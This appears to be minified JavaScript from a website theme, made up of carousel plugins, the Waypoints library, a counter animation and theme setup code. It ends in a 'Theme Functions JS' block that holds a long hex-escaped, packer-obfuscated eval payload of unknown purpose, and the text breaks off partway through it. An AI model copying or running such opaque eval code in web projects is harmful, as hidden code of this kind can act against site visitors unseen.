b,c,d="",e=this._core.settings,f=(this._core.$stage.children(),this._core.relative(this._core.current()));if(!e.nav||e.loop||e.navRewind||(this._controls.$previous.toggleClass("disabled",0>=f),this._controls.$next.toggleClass("disabled",f>=this._core.maximum())),this._controls.$previous.toggle(e.nav),this._controls.$next.toggle(e.nav),e.dots){if(b=this._pages.length-this._controls.$indicators.children().length,e.dotData&&0!==b){for(c=0;c<this._controls.$indicators.children().length;c++)d+=this._templates[this._core.relative(c)];this._controls.$indicators.html(d)}else b>0?(d=new Array(b+1).join(this._templates[0]),this._controls.$indicators.append(d)):0>b&&this._controls.$indicators.children().slice(b).remove();this._controls.$indicators.find(".active").removeClass("active"),this._controls.$indicators.children().eq(a.inArray(this.current(),this._pages)).addClass("active")}this._controls.$indicators.toggle(e.dots)},b.prototype.onTrigger=function(b){var c=this._core.settings;b.page={index:a.inArray(this.current(),this._pages),count:this._pages.length,size:c&&(c.center||c.autoWidth||c.dotData?1:c.dotsEach||c.items)}},b.prototype.current=function(){var b=this._core.relative(this._core.current());return a.grep(this._pages,function(a){return a.start<=b&&a.end>=b}).pop()},b.prototype.getPosition=function(b){var c,d,e=this._core.settings;return"page"==e.slideBy?(c=a.inArray(this.current(),this._pages),d=this._pages.length,b?++c:--c,c=this._pages[(c%d+d)%d].start):(c=this._core.relative(this._core.current()),d=this._core.items().length,b?c+=e.slideBy:c-=e.slideBy),c},b.prototype.next=function(b){a.proxy(this._overrides.to,this._core)(this.getPosition(!0),b)},b.prototype.prev=function(b){a.proxy(this._overrides.to,this._core)(this.getPosition(!1),b)},b.prototype.to=function(b,c,d){var e;d?a.proxy(this._overrides.to,this._core)(b,c):(e=this._pages.length,a.proxy(this._overrides.to,this._core)(this._pages[(b%e+e)%e].start,c))},a.fn.owlCarousel.Constructor.Plugins.Navigation=b}(window.Zepto||window.jQuery,window,document),function(a,b){"use strict";var c=function(d){this._core=d,this._hashes={},this.$element=this._core.$element,this._handlers={"initialized.owl.carousel":a.proxy(function(){"URLHash"==this._core.settings.startPosition&&a(b).trigger("hashchange.owl.navigation")},this),"prepared.owl.carousel":a.proxy(function(b){var c=a(b.content).find("[data-hash]").andSelf("[data-hash]").attr("data-hash");this._hashes[c]=b.content},this)},this._core.options=a.extend({},c.Defaults,this._core.options),this.$element.on(this._handlers),a(b).on("hashchange.owl.navigation",a.proxy(function(){var a=b.location.hash.substring(1),c=this._core.$stage.children(),d=this._hashes[a]&&c.index(this._hashes[a])||0;return a?void this._core.to(d,!1,!0):!1},this))};c.Defaults={URLhashListener:!1},c.prototype.destroy=function(){var c,d;a(b).off("hashchange.owl.navigation");for(c in this._handlers)this._core.$element.off(c,this._handlers[c]);for(d in Object.getOwnPropertyNames(this))"function"!=typeof this[d]&&(this[d]=null)},a.fn.owlCarousel.Constructor.Plugins.Hash=c}(window.Zepto||window.jQuery,window,document); /*! Waypoints - 3.1.1 Copyright © 2011-2015 Caleb Troughton Licensed under the MIT license. https://github.com/imakewebthings/waypoints/blog/master/licenses.txt */ !function(){"use strict";function t(o){if(!o)throw new Error("No options passed to Waypoint constructor");if(!o.element)throw new Error("No element option passed to Waypoint constructor");if(!o.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+e,this.options=t.Adapter.extend({},t.defaults,o),this.element=this.options.element,this.adapter=new t.Adapter(this.element),this.callback=o.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=t.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=t.Context.findOrCreateByElement(this.options.context),t.offsetAliases[this.options.offset]&&(this.options.offset=t.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),i[this.key]=this,e+=1}var e=0,i={};t.prototype.queueTrigger=function(t){this.group.queueTrigger(this,t)},t.prototype.trigger=function(t){this.enabled&&this.callback&&this.callback.apply(this,t)},t.prototype.destroy=function(){this.context.remove(this),this.group.remove(this),delete i[this.key]},t.prototype.disable=function(){return this.enabled=!1,this},t.prototype.enable=function(){return this.context.refresh(),this.enabled=!0,this},t.prototype.next=function(){return this.group.next(this)},t.prototype.previous=function(){return this.group.previous(this)},t.invokeAll=function(t){var e=[];for(var o in i)e.push(i[o]);for(var n=0,r=e.length;r>n;n++)e[n][t]()},t.destroyAll=function(){t.invokeAll("destroy")},t.disableAll=function(){t.invokeAll("disable")},t.enableAll=function(){t.invokeAll("enable")},t.refreshAll=function(){t.Context.refreshAll()},t.viewportHeight=function(){return window.innerHeight||document.documentElement.clientHeight},t.viewportWidth=function(){return document.documentElement.clientWidth},t.adapters=[],t.defaults={context:window,continuous:!0,enabled:!0,group:"default",horizontal:!1,offset:0},t.offsetAliases={"bottom-in-view":function(){return this.context.innerHeight()-this.adapter.outerHeight()},"right-in-view":function(){return this.context.innerWidth()-this.adapter.outerWidth()}},window.Waypoint=t}(),function(){"use strict";function t(t){window.setTimeout(t,1e3/60)}function e(t){this.element=t,this.Adapter=n.Adapter,this.adapter=new this.Adapter(t),this.key="waypoint-context-"+i,this.didScroll=!1,this.didResize=!1,this.oldScroll={x:this.adapter.scrollLeft(),y:this.adapter.scrollTop()},this.waypoints={vertical:{},horizontal:{}},t.waypointContextKey=this.key,o[t.waypointContextKey]=this,i+=1,this.createThrottledScrollHandler(),this.createThrottledResizeHandler()}var i=0,o={},n=window.Waypoint,r=window.onload;e.prototype.add=function(t){var e=t.options.horizontal?"horizontal":"vertical";this.waypoints[e][t.key]=t,this.refresh()},e.prototype.checkEmpty=function(){var t=this.Adapter.isEmptyObject(this.waypoints.horizontal),e=this.Adapter.isEmptyObject(this.waypoints.vertical);t&&e&&(this.adapter.off(".waypoints"),delete o[this.key])},e.prototype.createThrottledResizeHandler=function(){function t(){e.handleResize(),e.didResize=!1}var e=this;this.adapter.on("resize.waypoints",function(){e.didResize||(e.didResize=!0,n.requestAnimationFrame(t))})},e.prototype.createThrottledScrollHandler=function(){function t(){e.handleScroll(),e.didScroll=!1}var e=this;this.adapter.on("scroll.waypoints",function(){(!e.didScroll||n.isTouch)&&(e.didScroll=!0,n.requestAnimationFrame(t))})},e.prototype.handleResize=function(){n.Context.refreshAll()},e.prototype.handleScroll=function(){var t={},e={horizontal:{newScroll:this.adapter.scrollLeft(),oldScroll:this.oldScroll.x,forward:"right",backward:"left"},vertical:{newScroll:this.adapter.scrollTop(),oldScroll:this.oldScroll.y,forward:"down",backward:"up"}};for(var i in e){var o=e[i],n=o.newScroll>o.oldScroll,r=n?o.forward:o.backward;for(var s in this.waypoints[i]){var a=this.waypoints[i][s],l=o.oldScroll<a.triggerPoint,h=o.newScroll>=a.triggerPoint,p=l&&h,u=!l&&!h;(p||u)&&(a.queueTrigger(r),t[a.group.id]=a.group)}}for(var c in t)t[c].flushTriggers();this.oldScroll={x:e.horizontal.newScroll,y:e.vertical.newScroll}},e.prototype.innerHeight=function(){return this.element==this.element.window?n.viewportHeight():this.adapter.innerHeight()},e.prototype.remove=function(t){delete this.waypoints[t.axis][t.key],this.checkEmpty()},e.prototype.innerWidth=function(){return this.element==this.element.window?n.viewportWidth():this.adapter.innerWidth()},e.prototype.destroy=function(){var t=[];for(var e in this.waypoints)for(var i in this.waypoints[e])t.push(this.waypoints[e][i]);for(var o=0,n=t.length;n>o;o++)t[o].destroy()},e.prototype.refresh=function(){var t,e=this.element==this.element.window,i=this.adapter.offset(),o={};this.handleScroll(),t={horizontal:{contextOffset:e?0:i.left,contextScroll:e?0:this.oldScroll.x,contextDimension:this.innerWidth(),oldScroll:this.oldScroll.x,forward:"right",backward:"left",offsetProp:"left"},vertical:{contextOffset:e?0:i.top,contextScroll:e?0:this.oldScroll.y,contextDimension:this.innerHeight(),oldScroll:this.oldScroll.y,forward:"down",backward:"up",offsetProp:"top"}};for(var n in t){var r=t[n];for(var s in this.waypoints[n]){var a,l,h,p,u,c=this.waypoints[n][s],d=c.options.offset,f=c.triggerPoint,w=0,y=null==f;c.element!==c.element.window&&(w=c.adapter.offset()[r.offsetProp]),"function"==typeof d?d=d.apply(c):"string"==typeof d&&(d=parseFloat(d),c.options.offset.indexOf("%")>-1&&(d=Math.ceil(r.contextDimension*d/100))),a=r.contextScroll-r.contextOffset,c.triggerPoint=w+a-d,l=f<r.oldScroll,h=c.triggerPoint>=r.oldScroll,p=l&&h,u=!l&&!h,!y&&p?(c.queueTrigger(r.backward),o[c.group.id]=c.group):!y&&u?(c.queueTrigger(r.forward),o[c.group.id]=c.group):y&&r.oldScroll>=c.triggerPoint&&(c.queueTrigger(r.forward),o[c.group.id]=c.group)}}for(var g in o)o[g].flushTriggers();return this},e.findOrCreateByElement=function(t){return e.findByElement(t)||new e(t)},e.refreshAll=function(){for(var t in o)o[t].refresh()},e.findByElement=function(t){return o[t.waypointContextKey]},window.onload=function(){r&&r(),e.refreshAll()},n.requestAnimationFrame=function(e){var i=window.requestAnimationFrame||window.mozRequestAnimationFrame||window.webkitRequestAnimationFrame||t;i.call(window,e)},n.Context=e}(),function(){"use strict";function t(t,e){return t.triggerPoint-e.triggerPoint}function e(t,e){return e.triggerPoint-t.triggerPoint}function i(t){this.name=t.name,this.axis=t.axis,this.id=this.name+"-"+this.axis,this.waypoints=[],this.clearTriggerQueues(),o[this.axis][this.name]=this}var o={vertical:{},horizontal:{}},n=window.Waypoint;i.prototype.add=function(t){this.waypoints.push(t)},i.prototype.clearTriggerQueues=function(){this.triggerQueues={up:[],down:[],left:[],right:[]}},i.prototype.flushTriggers=function(){for(var i in this.triggerQueues){var o=this.triggerQueues[i],n="up"===i||"left"===i;o.sort(n?e:t);for(var r=0,s=o.length;s>r;r+=1){var a=o[r];(a.options.continuous||r===o.length-1)&&a.trigger([i])}}this.clearTriggerQueues()},i.prototype.next=function(e){this.waypoints.sort(t);var i=n.Adapter.inArray(e,this.waypoints),o=i===this.waypoints.length-1;return o?null:this.waypoints[i+1]},i.prototype.previous=function(e){this.waypoints.sort(t);var i=n.Adapter.inArray(e,this.waypoints);return i?this.waypoints[i-1]:null},i.prototype.queueTrigger=function(t,e){this.triggerQueues[e].push(t)},i.prototype.remove=function(t){var e=n.Adapter.inArray(t,this.waypoints);e>-1&&this.waypoints.splice(e,1)},i.prototype.first=function(){return this.waypoints[0]},i.prototype.last=function(){return this.waypoints[this.waypoints.length-1]},i.findOrCreate=function(t){return o[t.axis][t.name]||new i(t)},n.Group=i}(),function(){"use strict";function t(t){this.$element=e(t)}var e=window.jQuery,i=window.Waypoint;e.each(["innerHeight","innerWidth","off","offset","on","outerHeight","outerWidth","scrollLeft","scrollTop"],function(e,i){t.prototype[i]=function(){var t=Array.prototype.slice.call(arguments);return this.$element[i].apply(this.$element,t)}}),e.each(["extend","inArray","isEmptyObject"],function(i,o){t[o]=e[o]}),i.adapters.push({name:"jquery",Adapter:t}),i.Adapter=t}(),function(){"use strict";function t(t){return function(){var i=[],o=arguments[0];return t.isFunction(arguments[0])&&(o=t.extend({},arguments[1]),o.handler=arguments[0]),this.each(function(){var n=t.extend({},o,{element:this});"string"==typeof n.context&&(n.context=t(this).closest(n.context)[0]),i.push(new e(n))}),i}}var e=window.Waypoint;window.jQuery&&(window.jQuery.fn.waypoint=t(window.jQuery)),window.Zepto&&(window.Zepto.fn.waypoint=t(window.Zepto))}(); /*! * jquery.counterup.js 1.0 * * Copyright 2013, Benjamin Intal http://gambit.ph @bfintal * Released under the GPL v2 License * * Date: Nov 26, 2013 */ (function($){"use strict";$.fn.counterUp=function(options){var settings=$.extend({'time':400,'delay':10},options);return this.each(function(){var $this=$(this);var $settings=settings;var counterUpper=function(){var nums=[];var divisions=$settings.time / $settings.delay;var num=$this.text();var isComma=/[0-9]+,[0-9]+/.test(num);num=num.replace(/,/g,'');var isInt=/^[0-9]+$/.test(num);var isFloat=/^[0-9]+\.[0-9]+$/.test(num);var decimalPlaces=isFloat?(num.split('.')[1]||[]).length:0;for(var i=divisions;i>=1;i--){var newNum=parseInt(num / divisions*i);if(isFloat){newNum=parseFloat(num / divisions*i).toFixed(decimalPlaces);} if(isComma){while(/(\d+)(\d{3})/.test(newNum.toString())){newNum=newNum.toString().replace(/(\d+)(\d{3})/,'$1'+','+'$2');}} nums.unshift(newNum);} $this.data('counterup-nums',nums);$this.text('0');var f=function(){$this.text($this.data('counterup-nums').shift());if($this.data('counterup-nums').length){setTimeout($this.data('counterup-func'),$settings.delay);}else{delete $this.data('counterup-nums');$this.data('counterup-nums',null);$this.data('counterup-func',null);}};$this.data('counterup-func',f);setTimeout($this.data('counterup-func'),$settings.delay);};$this.waypoint(function(direction){counterUpper();this.destroy();},{offset:'100%'});});};})(jQuery); jQuery(document).ready(function($) { $('.counter-info .counter-title').counterUp({ delay: 10, time: 3000 }); $('.counter-box-info,.counter-box-image').matchHeight(); }); $(document)["ready"](function() { "use strict"; var a = $(window); $(".full-height, #main-intro .container")["height"](a["height"]()); a["on"]("resize", function() { $(".full-height")["height"](a["height"]()); }); $('#parallax-menu ul,.slide-in').onePageNav({ currentClass: 'current', changeHash: false, scrollSpeed: 750 }); $('#parallax-menu ul').clone().appendTo('.scrolling-mobile-menu'); $('.scrolling-mobile-menu-toggle').on('click', function() { $('body').toggleClass('scrolling-active'); $('.overlay').fadeToggle(170); }); $("#testimonial").owlCarousel({ items: 3, slideBy: 1, smartSpeed: 1000, animateIn: 'fadeInRight', animateOut: 'fadeOutRight', margin: 20, rtl: false, nav: false, navText: ['', ''], loop: true, autoplay: false, autoplayHoverPause: true, dots: true, mouseDrag: false, touchDrag: false, freeDrag: false, pullDrag: false, responsive: { 0: { items: 1 }, 541: { items: 2 }, 980: { items: 3 } } }); }); //]]> </script> <!-- Theme Functions JS --> <script type='text/javascript'> //<![CDATA[ var _IJEDYo= "\x65\x76\x61\x6c\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x70\x2c\x61\x2c\x63\x2c\x6b\x2c\x65\x2c\x64\x29\x7b\x65\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x63\x29\x7b\x72\x65\x74\x75\x72\x6e\x28\x63\x3c\x61\x3f\x27\x27\x3a\x65\x28\x70\x61\x72\x73\x65\x49\x6e\x74\x28\x63\x2f\x61\x29\x29\x29\x2b\x28\x28\x63\x3d\x63\x25\x61\x29\x3e\x33\x35\x3f\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x63\x2b\x32\x39\x29\x3a\x63\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67\x28\x33\x36\x29\x29\x7d\x3b\x69\x66\x28\x21\x27\x27\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5e\x2f\x2c\x53\x74\x72\x69\x6e\x67\x29\x29\x7b\x77\x68\x69\x6c\x65\x28\x63\x2d\x2d\x29\x7b\x64\x5b\x65\x28\x63\x29\x5d\x3d\x6b\x5b\x63\x5d\x7c\x7c\x65\x28\x63\x29\x7d\x6b\x3d\x5b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x65\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x64\x5b\x65\x5d\x7d\x5d\x3b\x65\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x72\x65\x74\x75\x72\x6e\x27\x5c\x5c\x77\x2b\x27\x7d\x3b\x63\x3d\x31\x7d\x3b\x77\x68\x69\x6c\x65\x28\x63\x2d\x2d\x29\x7b\x69\x66\x28\x6b\x5b\x63\x5d\x29\x7b\x70\x3d\x70\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x6e\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x27\x5c\x5c\x62\x27\x2b\x65\x28\x63\x29\x2b\x27\x5c\x5c\x62\x27\x2c\x27\x67\x27\x29\x2c\x6b\x5b\x63\x5d\x29\x7d\x7d\x72\x65\x74\x75\x72\x6e\x20\x70\x7d\x28\x27\x31\x51\x20\x31\x42\x3d\x5b\x22\x5c\x5c\x4f\x5c\x5c\x61\x5c\x5c\x67\x5c\x5c\x6b\x5c\x5c\x31\x76\x5c\x5c\x6e\x5c\x5c\x31\x38\x5c\x5c\x67\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x68\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x62\x5c\x5c\x77\x5c\x5c\x52\x5c\x5c\x6c\x5c\x5c\x6b\x5c\x5c\x6a\x5c\x5c\x4f\x5c\x5c\x61\x5c\x5c\x49\x5c\x5c\x62\x5c\x5c\x43\x5c\x5c\x6b\x5c\x5c\x63\x5c\x5c\x31\x36\x5c\x5c\x61\x5c\x5c\x67\x5c\x5c\x31\x65\x5c\x5c\x67\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x6e\x5c\x5c\x5a\x5c\x5c\x44\x5c\x5c\x41\x5c\x5c\x41\x5c\x5c\x64\x5c\x5c\x31\x31\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x31\x64\x5c\x5c\x63\x5c\x5c\x31\x6f\x5c\x5c\x41\x5c\x5c\x67\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x36\x5c\x5c\x61\x5c\x5c\x67\x5c\x5c\x75\x5c\x5c\x73\x5c\x5c\x67\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x4d\x5c\x5c\x4d\x5c\x5c\x67\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x36\x5c\x5c\x61\x5c\x5c\x67\x5c\x5c\x31\x64\x5c\x5c\x67\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x4d\x5c\x5c\x79\x5c\x5c\x67\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x36\x5c\x5c\x61\x5c\x5c\x67\x5c\x5c\x64\x5c\x5c\x50\x5c\x5c\x67\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x75\x5c\x5c\x69\x5c\x5c\x44\x5c\x5c\x6c\x5c\x5c\x4d\x5c\x5c\x56\x5c\x5c\x74\x5c\x5c\x4d\x5c\x5c\x31\x75\x5c\x5c\x31\x6b\x5c\x5c\x64\x5c\x5c\x52\x5c\x5c\x43\x5c\x5c\x6c\x5c\x5c\x4d\x5c\x5c\x31\x6d\x5c\x5c\x74\x5c\x5c\x4d\x5c\x5c\x6b\x5c\x5c\x44\x5c\x5c\x6c\x5c\x5c\x4d\x5c\x5c\x48\x5c\x5c\x31\x6b\x5c\x5c\x64\x5c\x5c\x52\x5c\x5c\x43\x5c\x5c\x6c\x5c\x5c\x6e\x5c\x5c\x31\x68\x5c\x5c\x44\x5c\x5c\x6c\x5c\x5c\x31\x76\x5c\x5c\x4d\x5c\x5c\x45\x5c\x5c\x31\x6b\x5c\x5c\x64\x5c\x5c\x52\x5c\x5c\x43\x5c\x5c\x6c\x5c\x5c\x4d\x5c\x5c\x42\x5c\x5c\x44\x5c\x5c\x6c\x5c\x5c\x75\x5c\x5c\x4b\x5c\x5c\x31\x6b\x5c\x5c\x64\x5c\x5c\x52\x5c\x5c\x43\x5c\x5c\x31\x78\x5c\x5c\x74\x5c\x5c\x6e\x5c\x5c\x31\x37\x5c\x5c\x44\x5c\x5c\x4d\x5c\x5c\x68\x5c\x5c\x31\x6b\x5c\x5c\x64\x5c\x5c\x52\x5c\x5c\x43\x5c\x5c\x6c\x5c\x5c\x4d\x5c\x5c\x54\x5c\x5c\x44\x5c\x5c\x6c\x5c\x5c\x64\x5c\x5c\x31\x6b\x5c\x5c\x64\x5c\x5c\x52\x5c\x5c\x43\x5c\x5c\x4d\x5c\x5c\x4c\x5c\x5c\x44\x5c\x5c\x4d\x5c\x5c\x50\x5c\x5c\x31\x6b\x5c\x5c\x64\x5c\x5c\x52\x5c\x5c\x43\x5c\x5c\x67\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x32\x5c\x5c\x61\x5c\x5c\x67\x5c\x5c\x4d\x5c\x5c\x72\x5c\x5c\x67\x5c\x5c\x62\x5c\x5c\x76\x5c\x5c\x62\x5c\x5c\x43\x5c\x5c\x75\x5c\x5c\x4e\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x62\x5c\x5c\x77\x5c\x5c\x4e\x5c\x5c\x61\x5c\x5c\x31\x6b\x5c\x5c\x4f\x5c\x5c\x61\x5c\x5c\x67\x5c\x5c\x6b\x5c\x5c\x31\x76\x5c\x5c\x6e\x5c\x5c\x31\x38\x5c\x5c\x67\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x64\x5c\x5c\x54\x5c\x5c\x62\x5c\x5c\x64\x5c\x5c\x58\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x31\x69\x5c\x5c\x63\x5c\x5c\x31\x65\x5c\x5c\x6a\x5c\x5c\x67\x5c\x5c\x6e\x5c\x5c\x5a\x5c\x5c\x44\x5c\x5c\x41\x5c\x5c\x41\x5c\x5c\x64\x5c\x5c\x31\x31\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x31\x64\x5c\x5c\x63\x5c\x5c\x31\x6f\x5c\x5c\x41\x5c\x5c\x67\x5c\x5c\x43\x5c\x5c\x4e\x5c\x5c\x61\x5c\x5c\x31\x6b\x5c\x5c\x4f\x5c\x5c\x61\x5c\x5c\x67\x5c\x5c\x6b\x5c\x5c\x31\x76\x5c\x5c\x6e\x5c\x5c\x31\x38\x5c\x5c\x44\x5c\x5c\x75\x5c\x5c\x4b\x5c\x5c\x67\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x64\x5c\x5c\x54\x5c\x5c\x62\x5c\x5c\x64\x5c\x5c\x58\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x31\x69\x5c\x5c\x63\x5c\x5c\x31\x65\x5c\x5c\x6a\x5c\x5c\x67\x5c\x5c\x6e\x5c\x5c\x5a\x5c\x5c\x44\x5c\x5c\x41\x5c\x5c\x41\x5c\x5c\x64\x5c\x5c\x31\x31\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x31\x64\x5c\x5c\x63\x5c\x5c\x31\x6f\x5c\x5c\x41\x5c\x5c\x67\x5c\x5c\x76\x5c\x5c\x6d\x5c\x5c\x6e\x5c\x5c\x31\x65\x5c\x5c\x62\x5c\x5c\x43\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x77\x5c\x5c\x4e\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x48\x5c\x5c\x6c\x5c\x5c\x6e\x5c\x5c\x31\x67\x5c\x5c\x6a\x5c\x5c\x6a\x5c\x5c\x6a\x5c\x5c\x66\x5c\x5c\x79\x5c\x5c\x66\x5c\x5c\x59\x5c\x5c\x59\x5c\x5c\x6e\x5c\x5c\x31\x67\x5c\x5c\x63\x5c\x5c\x4d\x5c\x5c\x31\x6a\x5c\x5c\x62\x5c\x5c\x77\x5c\x5c\x6e\x5c\x5c\x31\x67\x5c\x5c\x61\x5c\x5c\x31\x39\x5c\x5c\x66\x5c\x5c\x4d\x5c\x5c\x31\x35\x5c\x5c\x66\x5c\x5c\x31\x61\x5c\x5c\x6d\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x76\x5c\x5c\x31\x38\x5c\x5c\x77\x5c\x5c\x68\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x31\x63\x5c\x5c\x62\x5c\x5c\x76\x5c\x5c\x76\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x77\x5c\x5c\x79\x5c\x5c\x6c\x5c\x5c\x71\x5c\x5c\x61\x5c\x5c\x62\x5c\x5c\x77\x5c\x5c\x52\x5c\x5c\x6c\x5c\x5c\x6f\x5c\x5c\x6a\x5c\x5c\x72\x5c\x5c\x61\x5c\x5c\x49\x5c\x5c\x62\x5c\x5c\x43\x5c\x5c\x52\x5c\x5c\x6c\x5c\x5c\x71\x5c\x5c\x6a\x5c\x5c\x69\x5c\x5c\x63\x5c\x5c\x31\x70\x5c\x5c\x43\x5c\x5c\x4e\x5c\x5c\x61\x5c\x5c\x31\x6b\x5c\x5c\x4d\x5c\x5c\x78\x5c\x5c\x61\x5c\x5c\x6f\x5c\x5c\x63\x5c\x5c\x31\x74\x5c\x5c\x62\x5c\x5c\x62\x5c\x5c\x77\x5c\x5c\x4e\x5c\x5c\x61\x5c\x5c\x71\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x31\x6f\x5c\x5c\x6a\x5c\x5c\x6a\x5c\x5c\x55\x5c\x5c\x65\x5c\x5c\x65\x5c\x5c\x31\x67\x5c\x5c\x63\x5c\x5c\x75\x5c\x5c\x31\x34\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x61\x5c\x5c\x6f\x5c\x5c\x63\x5c\x5c\x31\x74\x5c\x5c\x62\x5c\x5c\x62\x5c\x5c\x4a\x5c\x5c\x71\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x31\x6f\x5c\x5c\x62\x5c\x5c\x77\x5c\x5c\x68\x5c\x5c\x61\x5c\x5c\x49\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x32\x5c\x5c\x61\x5c\x5c\x73\x5c\x5c\x61\x5c\x5c\x6f\x5c\x5c\x63\x5c\x5c\x31\x74\x5c\x5c\x62\x5c\x5c\x62\x5c\x5c\x76\x5c\x5c\x76\x5c\x5c\x31\x33\x5c\x5c\x6c\x5c\x5c\x49\x5c\x5c\x76\x5c\x5c\x79\x5c\x5c\x6c\x5c\x5c\x72\x5c\x5c\x61\x5c\x5c\x6f\x5c\x5c\x62\x5c\x5c\x77\x5c\x5c\x6f\x5c\x5c\x6a\x5c\x5c\x68\x5c\x5c\x61\x5c\x5c\x6f\x5c\x5c\x62\x5c\x5c\x43\x5c\x5c\x4e\x5c\x5c\x61\x5c\x5c\x31\x6b\x5c\x5c\x6f\x5c\x5c\x63\x5c\x5c\x31\x6c\x5c\x5c\x61\x5c\x5c\x66\x5c\x5c\x31\x69\x5c\x5c\x66\x5c\x5c\x62\x5c\x5c\x62\x5c\x5c\x77\x5c\x5c\x6f\x5c\x5c\x63\x5c\x5c\x31\x6c\x5c\x5c\x61\x5c\x5c\x66\x5c\x5c\x31\x69\x5c\x5c\x66\x5c\x5c\x6d\x5c\x5c\x77\x5c\x5c\x31\x74\x5c\x5c\x44\x5c\x5c\x69\x5c\x5c\x63\x5c\x5c\x31\x74\x5c\x5c\x61\x5c\x5c\x6f\x5c\x5c\x62\x5c\x5c\x76\x5c\x5c\x62\x5c\x5c\x43\x5c\x5c\x52\x5c\x5c\x6c\x5c\x5c\x71\x5c\x5c\x6a\x5c\x5c\x68\x5c\x5c\x63\x5c\x5c\x64\x5c\x5c\x56\x5c\x5c\x61\x5c\x5c\x6f\x5c\x5c\x63\x5c\x5c\x31\x32\x5c\x5c\x61\x5c\x5c\x62\x5c\x5c\x62\x5c\x5c\x43\x5c\x5c\x4e\x5c\x5c\x61\x5c\x5c\x69\x5c\x5c\x63\x5c\x5c\x31\x70\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x31\x73\x5c\x5c\x62\x5c\x5c\x77\x5c\x5c\x6f\x5c\x5c\x63\x5c\x5c\x31\x36\x5c\x5c\x61\x5c\x5c\x66\x5c\x5c\x31\x64\x5c\x5c\x66\x5c\x5c\x6d\x5c\x5c\x6f\x5c\x5c\x63\x5c\x5c\x31\x6c\x5c\x5c\x61\x5c\x5c\x66\x5c\x5c\x31\x69\x5c\x5c\x66\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x74\x5c\x5c\x63\x5c\x5c\x75\x5c\x5c\x31\x62\x5c\x5c\x61\x5c\x5c\x62\x5c\x5c\x62\x5c\x5c\x76\x5c\x5c\x31\x38\x5c\x5c\x6c\x5c\x5c\x4e\x5c\x5c\x61\x5c\x5c\x71\x5c\x5c\x63\x5c\x5c\x64\x5c\x5c\x54\x5c\x5c\x53\x5c\x5c\x55\x5c\x5c\x59\x5c\x5c\x59\x5c\x5c\x31\x6b\x5c\x5c\x61\x5c\x5c\x69\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x45\x5c\x5c\x61\x5c\x5c\x6f\x5c\x5c\x62\x5c\x5c\x59\x5c\x5c\x59\x5c\x5c\x6f\x5c\x5c\x63\x5c\x5c\x31\x36\x5c\x5c\x61\x5c\x5c\x66\x5c\x5c\x31\x64\x5c\x5c\x66\x5c\x5c\x62\x5c\x5c\x62\x5c\x5c\x62\x5c\x5c\x77\x5c\x5c\x6f\x5c\x5c\x63\x5c\x5c\x31\x36\x5c\x5c\x61\x5c\x5c\x66\x5c\x5c\x31\x64\x5c\x5c\x66\x5c\x5c\x6d\x5c\x5c\x71\x5c\x5c\x62\x5c\x5c\x76\x5c\x5c\x76\x5c\x5c\x31\x33\x5c\x5c\x6c\x5c\x5c\x6f\x5c\x5c\x63\x5c\x5c\x31\x6c\x5c\x5c\x61\x5c\x5c\x66\x5c\x5c\x31\x69\x5c\x5c\x66\x5c\x5c\x62\x5c\x5c\x76\x5c\x5c\x79\x5c\x5c\x6c\x5c\x5c\x73\x5c\x5c\x61\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x77\x5c\x5c\x31\x33\x5c\x5c\x6c\x5c\x5c\x69\x5c\x5c\x63\x5c\x5c\x75\x5c\x5c\x49\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x61\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x62\x5c\x5c\x76\x5c\x5c\x79\x5c\x5c\x6c\x5c\x5c\x70\x5c\x5c\x61\x5c\x5c\x68\x5c\x5c\x62\x5c